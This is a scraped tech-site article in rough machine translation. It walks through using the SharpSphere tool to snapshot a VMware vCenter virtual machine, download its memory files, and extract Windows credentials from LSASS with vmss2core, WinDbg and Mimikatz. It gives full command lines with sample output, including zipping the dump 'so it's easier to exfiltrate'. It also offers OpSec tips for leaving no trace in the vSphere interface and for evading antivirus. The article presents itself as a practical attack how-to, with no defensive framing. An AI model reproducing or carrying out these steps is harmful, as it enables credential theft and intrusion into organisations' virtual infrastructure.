Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to understand SharpSphere dump LSASS memory". In daily operation, I believe many people have doubts about how to understand SharpSphere dump LSASS memory. I have consulted all kinds of materials and sorted out simple and easy operation methods. I hope to help you answer the doubts about "how to understand SharpSphere dump LSASS memory"! Next, please follow the small series to learn together!

But until now, it has been difficult to play a role in practice, mainly because:

1. vCenter/ESXi validation required

2. Create snapshot with memory for target VM

3. Data needs to be downloaded locally,(usually very large).vmem and.vmsn files

4. Run through Volatility

5. Convert to.dmp using vmss2core and run with Mimikatz and WinDbg

Parameter Z:\>SharpSphere.exe dump --helpSharpSphere 1.0.0.0Copyright © 2020 --url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk --username Required. vCenter username, i.e. administrator@vsphere.local --password Required. vCenter password --targetvm Required. VM to snapshot --snapshot (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available. --destination Required. Full path to the local directory where the file should be downloaded --help Display this help screen. --version Display version information.- snapshot

By default, SharpSphere does not attempt to create a snapshot, but instead attempts to find valid.vmem and.vmsn files from existing snapshots. From an OpSec perspective, this is desirable because there is no evidence in the UI, but there is no guarantee that there are snapshots on the target, and whether these snapshots capture VM memory is also an issue. So SharpSphere exits if an existing snapshot does not exist.

So the--snapshot parameter specifies that SharpSphere creates a snapshot called System Backup [TIMESTAMP], downloads the associated.vmem and.vmsn files, and then deletes the snapshot once it is complete. Other users in the Recent Tasks window will see the creation and deletion of snapshots simultaneously.

Of course--snapshot can be checked to see if there is an existing snapshot

-destination

SharpSphere needs to download two files from the snapshot, a.vmem file equal in size to the RAM allocated to the machine (i.e. 4GB, 8GB, 16GB, etc.), and a much smaller.vmsn file. It downloads these files to the directory specified by--destination. But after downloading both files, SharpSphere adds them to a zip file with a random name and deletes them.

introduced

1. Execute SharpSphere with the following parameters (hint: use Get VM Name list):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

example output

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Finding existing snapshots for Windows 10... Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

2. If no snapshot exists, add a parameter--snapshot

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Creating snapshot for VM Windows 10... [x] Snapshot created successfully [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz... [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv... [x] Download complete, zipping up so it's easier to exfiltrate... [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz [x] Deleting the snapshot we created

3. If you use a tool like cs, you can load the remote loader directly on the target machine. Or, upload the tool to the target machine, but do a good job of killing.

4. In this case cec0kwgk.b2m will be renamed randomly to a zip file and then unzip both files. The bigger one is your.vmem file.

5. Download vmss2core and serve the smaller.vmsn file first, then the larger.vmem file. If the target VM is Microsoft Windows 8 / 8.1, Windows Server 2012, Windows Server 2016, or Windows Server 2019, execute the following command-W8:

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

Otherwise use-W:

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

6. Download WinDbg and load the.dmp file. vmss2core Crash Dump

7. Download Mimikatz and load Mimilib.dll using WinDbg

.load C:\Tools\Mimikatz\x64\mimilib.dll

8. Find the LSASS process

! process 0 0 lsass.exe

9. handoff procedure

.process /r /p ffffc70462d020c0

10. obtain credentials

! mimikatz At this point, the study of "how to understand SharpSphere dump LSASS memory" is over, hoping to solve everyone's doubts. Theory and practice can better match to help everyone learn, go and try it! If you want to continue learning more relevant knowledge, please continue to pay attention to the website, Xiaobian will continue to strive to bring more practical articles for everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.